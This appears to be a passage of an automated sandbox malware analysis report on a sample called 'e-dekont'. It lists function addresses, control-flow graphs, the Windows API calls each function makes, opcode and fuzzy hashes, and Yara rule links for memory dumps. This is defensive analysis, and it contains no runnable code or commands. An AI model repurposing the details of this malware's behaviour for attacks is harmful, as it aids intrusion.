                                                        • Opcode ID: 8dd56f4769cfbb4aad943f7b108a083594d4d68c37a825cfe2f7e5c401a9a27b
                                                        • Instruction ID: 63bbd1ae9ddbe47dec84a46af10e1f0c1ec41737a7777b43b4fd42d397e5b4f3
                                                        • Opcode Fuzzy Hash: 8dd56f4769cfbb4aad943f7b108a083594d4d68c37a825cfe2f7e5c401a9a27b
                                                        • Instruction Fuzzy Hash: 8B5165B4900249CFDB58EFAAD948B9EBBF1EB88314F20C459E409A7360CB355984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C24B68 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1167 6c24b68-6c24bf7 GetCurrentProcess 1172 6c24c00-6c24c34 GetCurrentThread 1167->1172 1173 6c24bf9-6c24bff 1167->1173 1174 6c24c36-6c24c3c 1172->1174 1175 6c24c3d-6c24c71 GetCurrentProcess 1172->1175 1173->1172 1174->1175 1177 6c24c73-6c24c79 1175->1177 1178 6c24c7a-6c24c92 1175->1178 1177->1178 1189 6c24c95 call 6c24d48 1178->1189 1190 6c24c95 call 6c24d38 1178->1190 1181 6c24c9b-6c24cca GetCurrentThreadId 1182 6c24cd3-6c24d35 1181->1182 1183 6c24ccc-6c24cd2 1181->1183 1183->1182 1189->1181 1190->1181
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24BE6
                                                        • GetCurrentThread.KERNEL32 ref: 06C24C23
                                                        • GetCurrentProcess.KERNEL32 ref: 06C24C60
                                                        • GetCurrentThreadId.KERNEL32 ref: 06C24CB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: fe8b627200b67f338ce35b5ba84963592199d2548e54e2f9b853de0eff2a3143
                                                        • Instruction ID: d7f145f33288a9166ad765f0521ce9592ca9fff1be17ec7fc025b96f3a42973d
                                                        • Opcode Fuzzy Hash: fe8b627200b67f338ce35b5ba84963592199d2548e54e2f9b853de0eff2a3143
                                                        • Instruction Fuzzy Hash: 2F5146B4900209CFDB54EFAAD948B9EBBF1EB88314F20C459E419A7360DB359944CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC21B4 Relevance: 5.5, Strings: 4, Instructions: 501COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1191 2dc21b4-2dc21be 1193 2dc2149-2dc2161 1191->1193 1194 2dc21c0-2dc2203 1191->1194 1197 2dc2168-2dc2190 1193->1197 1200 2dc2225-2dc2274 1194->1200 1201 2dc2205-2dc2224 1194->1201 1206 2dc228f-2dc2297 1200->1206 1207 2dc2276-2dc227d 1200->1207 1210 2dc229a-2dc22ae 1206->1210 1208 2dc227f-2dc2284 1207->1208 1209 2dc2286-2dc228d 1207->1209 1208->1210 1209->1210 1213 2dc22c4-2dc22cc 1210->1213 1214 2dc22b0-2dc22b7 1210->1214 1217 2dc22ce-2dc22d2 1213->1217 1215 2dc22bd-2dc22c2 1214->1215 1216 2dc22b9-2dc22bb 1214->1216 1215->1217 1216->1217 1219 2dc22d4-2dc22e9 1217->1219 1220 2dc2332-2dc2335 1217->1220 1219->1220 1228 2dc22eb-2dc22ee 1219->1228 1221 2dc237d-2dc2383 1220->1221 1222 2dc2337-2dc234c 1220->1222 1223 2dc2e7e 1221->1223 1224 2dc2389-2dc238b 1221->1224 1222->1221 1232 2dc234e-2dc2352 1222->1232 1229 2dc2e83-2dc307c 1223->1229 1224->1223 1226 2dc2391-2dc2396 1224->1226 1230 2dc2e2c-2dc2e30 1226->1230 1231 2dc239c 1226->1231 1233 2dc230d-2dc232b call 2dc02b8 1228->1233 1234 2dc22f0-2dc22f2 1228->1234 1256 2dc307e-2dc3096 1229->1256 1257 2dc30a7-2dc30c8 1229->1257 1236 2dc2e37-2dc2e7d 1230->1236 1237 2dc2e32-2dc2e35 1230->1237 1231->1230 1238 2dc235a-2dc2378 call 2dc02b8 1232->1238 1239 2dc2354-2dc2358 1232->1239 1233->1220 1234->1233 1240 2dc22f4-2dc22f7 1234->1240 1237->1229 1237->1236 1238->1221 1239->1221 1239->1238 1240->1220 1244 2dc22f9-2dc230b 1240->1244 1244->1220 1244->1233 1256->1257 1258 2dc30ca-2dc30f1 1257->1258 1259 2dc30f3-2dc31b6 1257->1259 1258->1259
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        • Opcode ID: 00c84c07657ebe94111d559d647e02cf97e4d969d055b95fe18bc38b462335ad
                                                        • Instruction ID: e944d4e3e264150964ec33ede7e7869b546215639bd658c65f356ca2191f550d
                                                        • Opcode Fuzzy Hash: 00c84c07657ebe94111d559d647e02cf97e4d969d055b95fe18bc38b462335ad
                                                        • Instruction Fuzzy Hash: 87029D34810A6A8FCB014FB88968299FBB0FFAF310F15C9E9D8895E256DF7159C6C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC7850 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 108c067d16c39e908a119abb9104de85f63d13fab48621c2f17ecdc86993d188
                                                        • Instruction ID: 088dc6680c5b11e7ca8d0b298fb03b2a8f0aca818d7a2a9eb7fdb248235ed3ba
                                                        • Opcode Fuzzy Hash: 108c067d16c39e908a119abb9104de85f63d13fab48621c2f17ecdc86993d188
                                                        • Instruction Fuzzy Hash: 77524474A00219CFEB159BA4C864BAEBB76FF94300F1091AEC10AAB3A5CF355D85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC8849 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q
                                                        • API String ID: 0-2697143702
                                                        • Opcode ID: 26572d2fda2e1cdac432cd3608d2c91859b995561ca82a8f967c314b6ed777fc
                                                        • Instruction ID: 71548e447bf3c5a2f567096338a95281da56d09154d16bbdfed37892ab955e92
                                                        • Opcode Fuzzy Hash: 26572d2fda2e1cdac432cd3608d2c91859b995561ca82a8f967c314b6ed777fc
                                                        • Instruction Fuzzy Hash: 35B181707052038FDB1A9E28CA58F3977A6EF85644F2404AEE146CF3A1EF25CC42E742
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC5700 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: 265269324a8064695c2ceeba0bd0f75dc1f2fa3bba035530bfaa508edbdbf891
                                                        • Instruction ID: 9a00f2452ecd1a7ab44402bfb89dd20b6bfe0b4074ebf508ef67b4f14fe20497
                                                        • Opcode Fuzzy Hash: 265269324a8064695c2ceeba0bd0f75dc1f2fa3bba035530bfaa508edbdbf891
                                                        • Instruction Fuzzy Hash: CD91CF34704246CFCB15AF28D894B6E7BA6BF88314F24886DE8469B395DF34EC51CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C02830 Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q
                                                        • API String ID: 0-4089051495
                                                        • Opcode ID: cd6ef792f1a65734c5a92a718d46cdfae3cea58647d1cc00045ccba8a0d9de66
                                                        • Instruction ID: 48234914ac4e229fe8f4af6173dfbd48fe446221e40c06836538aea7499f99aa
                                                        • Opcode Fuzzy Hash: cd6ef792f1a65734c5a92a718d46cdfae3cea58647d1cc00045ccba8a0d9de66
                                                        • Instruction Fuzzy Hash: 2081B135B001058FEB58DF79C85896E77B6FF88614B2185AAE405DB3A1DB34DE02CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC5C60 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,bq$,bq
                                                        • API String ID: 0-2699258169
                                                        • Opcode ID: a300a04cbe2a78c1224056768ad5cb2ff151fd11dc81dc165bf268e87597e328
                                                        • Instruction ID: 841ff731a17377bcfa4ffcd774c491a78156ea87afc319c62e87863d2cf7f11d
                                                        • Opcode Fuzzy Hash: a300a04cbe2a78c1224056768ad5cb2ff151fd11dc81dc165bf268e87597e328
                                                        • Instruction Fuzzy Hash: F6818074A00206CFCB14DF69E888AAAB7F6BF89214BA5816DD415EB365DB31FC41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C09960 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (&^q$(bq
                                                        • API String ID: 0-1294341849
                                                        • Opcode ID: 997231663acbc0beb4cb362dc59ef998f2e3a93587117ec0f77bd73ac4b96dd1
                                                        • Instruction ID: ff28e883ea153eb76566610edc534ca870d31c9e444ed55a7f1b0129bc16df59
                                                        • Opcode Fuzzy Hash: 997231663acbc0beb4cb362dc59ef998f2e3a93587117ec0f77bd73ac4b96dd1
                                                        • Instruction Fuzzy Hash: 5C71A231F002199BDB55DFB9C8906AEBBB6BFD8700F148529E405AB381DF309E06CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC3480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq
                                                        • API String ID: 0-1243427068
                                                        • Opcode ID: e19c866ba94a2a1385df83e2415a5c1697b79f2fb10acd79670ae279f841ce67
                                                        • Instruction ID: 893e1ad816e90fb78c0b9ffb400c816f4b90a83307f41bc4a54432ee718ceab9
                                                        • Opcode Fuzzy Hash: e19c866ba94a2a1385df83e2415a5c1697b79f2fb10acd79670ae279f841ce67
                                                        • Instruction Fuzzy Hash: 44313731B083268BDF995A7A859423EB6EAABC4314F38847DE802C3394DB75CC44C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2F6D0 Relevance: 1.7, APIs: 1, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C2F862
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 4c01d39523276bb9f76e4d37cc98112137f3808ce77a13f4589761624346abc7
                                                        • Instruction ID: 866871cd2574d76da74fe83dd13ec1a7d9d64ab436cd6812919e6aeffc384222
                                                        • Opcode Fuzzy Hash: 4c01d39523276bb9f76e4d37cc98112137f3808ce77a13f4589761624346abc7
                                                        • Instruction Fuzzy Hash: A7713475C05399AFCB11CFA9C880ACEBFB5AF49300F14815EE858AB262C7719955CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2D168 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4629d0ca89f99fc20a516aa812fdbf5f5a915533493651f613f5a63c8fb76a05
                                                        • Instruction ID: fffd068f460eb07218ad50b49013fa963bc2dd32d7f65c3a96edc46277d0c198
                                                        • Opcode Fuzzy Hash: 4629d0ca89f99fc20a516aa812fdbf5f5a915533493651f613f5a63c8fb76a05
                                                        • Instruction Fuzzy Hash: D77125B0A00B168FD7A4DF69D44475ABBF5FF98200F008A2ED88697A50DB75F945CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC0C8F Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q
                                                        • API String ID: 0-2625958711
                                                        • Opcode ID: 6e44126a08d84526fb9fb3863a7dea0ab32c4f65eddce83ad65c6cce887a9dc9
                                                        • Instruction ID: eb944cdb40275862636da0483b8d86cea2e1d0f4cbd52ebc2ce1c67bede56f79
                                                        • Opcode Fuzzy Hash: 6e44126a08d84526fb9fb3863a7dea0ab32c4f65eddce83ad65c6cce887a9dc9
                                                        • Instruction Fuzzy Hash: 5432BC78A40619DFCF54EF64E994A9DBBB2FF49301F1085AAD409AB368DB306D85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC0CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q
                                                        • API String ID: 0-2625958711
                                                        • Opcode ID: 3d48796a43376ea586337bb3ba64636db42ff78d4bd5126b7a83a22bf9e52936
                                                        • Instruction ID: 25068fe3a080724b152b33e90edf9c33ffb25cde2c34d7dc8e51bd1a34280312
                                                        • Opcode Fuzzy Hash: 3d48796a43376ea586337bb3ba64636db42ff78d4bd5126b7a83a22bf9e52936
                                                        • Instruction Fuzzy Hash: F422BC78A40619DFCF54EF64E994A9DBBB2FF49301F1085A6D409AB368DB306D85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2D84C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C2F862
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 31a138d516d6934c328be23e4fbfab81345aee7fbe9f53764cd5637d02b33ef4
                                                        • Instruction ID: 4fb46d55460fcdb7a35aa796f004a3fa66776c451a2cafdf043f3723befe60e0
                                                        • Opcode Fuzzy Hash: 31a138d516d6934c328be23e4fbfab81345aee7fbe9f53764cd5637d02b33ef4
                                                        • Instruction Fuzzy Hash: 1751BFB1D003199FDB14CF9AC884ADEBBB5FF48710F24852EE818AB210D775A985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4BFC4 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c0b35e1678347e0c45145521da06e10587a6c6eaec49efd0c3a55023c6cef64
                                                        • Instruction ID: e91342dfb1815e10981b44af3b881c04b6b949b136e5f33b5dddb77183db0f69
                                                        • Opcode Fuzzy Hash: 1c0b35e1678347e0c45145521da06e10587a6c6eaec49efd0c3a55023c6cef64
                                                        • Instruction Fuzzy Hash: 4A413474A45508DBCF24CF99D480AEDBBB2FF48310F209199E509AB381CB31E886DF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4BF64 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc7e41b6b5f26441ee867377082bf6e6f715ccea718d834c7d4b9c69b03942eb
                                                        • Instruction ID: 60b209e5fc9724fb19d2f9fef21d91ec5a87ebec2f1aae31a7e1be80cfc7fd2e
                                                        • Opcode Fuzzy Hash: fc7e41b6b5f26441ee867377082bf6e6f715ccea718d834c7d4b9c69b03942eb
                                                        • Instruction Fuzzy Hash: 04411374A05609DFCF24CF99D084AEDBBB2FF48314F249199E509AB391CB31A986DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4BE18 Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 320f23d1981712cb1ca5739b1c8015a704cef17b213402f3fcb51ee54b8200e5
                                                        • Instruction ID: b88c593adfc3e57d20a0d34e1b8c8239c98dbdb9e6f42b877a81029687aec41c
                                                        • Opcode Fuzzy Hash: 320f23d1981712cb1ca5739b1c8015a704cef17b213402f3fcb51ee54b8200e5
                                                        • Instruction Fuzzy Hash: 4D215BB1D012189BDB24CF9AD884BEEFBF6FF88310F249129E514A3290D7705946DFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C24834 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C24D76,?,?,?,?,?), ref: 06C24E37
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 40de62c94812da6dc03dc956f9c5ad49ca6253965420bac01d8bf7c542211edc
                                                        • Instruction ID: cac28b49099df80ccb2a05d593312d8163acb955928fabeba568a56ab6be8637
                                                        • Opcode Fuzzy Hash: 40de62c94812da6dc03dc956f9c5ad49ca6253965420bac01d8bf7c542211edc
                                                        • Instruction Fuzzy Hash: 7921E3B5900259DFDB10CF9AD984AEEFFF9EB48310F14846AE958A7310D374A950CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C24DA9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C24D76,?,?,?,?,?), ref: 06C24E37
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 26abe90bfc6ef2f01c4cd3c68bfe05763a1e12a67015bed0905374062f6fb5c6
                                                        • Instruction ID: 85d1753a260810c46bdaf8e155fb511dde671a5a9ccd047fa0608aeb827ea707
                                                        • Opcode Fuzzy Hash: 26abe90bfc6ef2f01c4cd3c68bfe05763a1e12a67015bed0905374062f6fb5c6
                                                        • Instruction Fuzzy Hash: 2F21F2B59012589FDB10CFAAD884AEEFBF5EB48320F10841AE918A3310D374A940CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B48D94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 05B48ED6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 035a439881b77658ad7806d76ec929d69cc1a34ed468bb37b387a692da212d8f
                                                        • Instruction ID: 4e78560dd091bb9dd3d4c35f8d5f2a5b2cc08748791b4d35d20b97b52b40e0f1
                                                        • Opcode Fuzzy Hash: 035a439881b77658ad7806d76ec929d69cc1a34ed468bb37b387a692da212d8f
                                                        • Instruction Fuzzy Hash: 17111774E411199BDB14DBA8D884EBDBBB6FB88304F54C5A5F904A7242DB30A8419F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2D5B8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06C2D439,00000800,00000000,00000000), ref: 06C2D62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: bf572913ff6ce145b0bcb0fdd6371e68cb0394e1ce4cf83e9300b23e2a402b71
                                                        • Instruction ID: aa3bae29895b5a716e25a37bdac118825bed51759101ea9c2169c1f54a15c038
                                                        • Opcode Fuzzy Hash: bf572913ff6ce145b0bcb0fdd6371e68cb0394e1ce4cf83e9300b23e2a402b71
                                                        • Instruction Fuzzy Hash: 331136B5C002599FCB20CFAAC884ADEFFF4AB98310F10851ED459A7250C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2C148 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06C2D439,00000800,00000000,00000000), ref: 06C2D62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: c997023d20b46bba939caa623b02755350783beaf53284160a4ca0b526c68474
                                                        • Instruction ID: 0584e48d4546b8dd640573624b8835af9ed321e5873fd40bd972838d82181062
                                                        • Opcode Fuzzy Hash: c997023d20b46bba939caa623b02755350783beaf53284160a4ca0b526c68474
                                                        • Instruction Fuzzy Hash: A41103B6D002198FDB10DF9AD888ADEFBF4EF98310F10842AD919A7210C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C2C100 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06C2D184), ref: 06C2D3BE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091933924.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c20000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 46f330556e679502ab23151311db915d5335f728c50c11cbd607eb9e7c09be67
                                                        • Instruction ID: c1cc83b88db6ba7b9c02407fd8149b149af4371c79d31bb3c2771a65236337cc
                                                        • Opcode Fuzzy Hash: 46f330556e679502ab23151311db915d5335f728c50c11cbd607eb9e7c09be67
                                                        • Instruction Fuzzy Hash: E91132B5C003598FCB10DF9AC444ADEFBF4EF88220F10846AD81AA7210C375A544CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCA6B0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q
                                                        • API String ID: 0-74704288
                                                        • Opcode ID: 03aa4a409ddd1aa69b1313580f22600987ea0bf422baa1d3bb7263e95743e68c
                                                        • Instruction ID: 328459a4b2f0a9ca288eb0db5544c31a9b935ba802b22d720647f336806f9a88
                                                        • Opcode Fuzzy Hash: 03aa4a409ddd1aa69b1313580f22600987ea0bf422baa1d3bb7263e95743e68c
                                                        • Instruction Fuzzy Hash: 6D41C235B042099FCB15AF69D8546AEBBF6BFC8611F24446DD906DB391DF309C01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCFDA8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                        Download Yara Rule
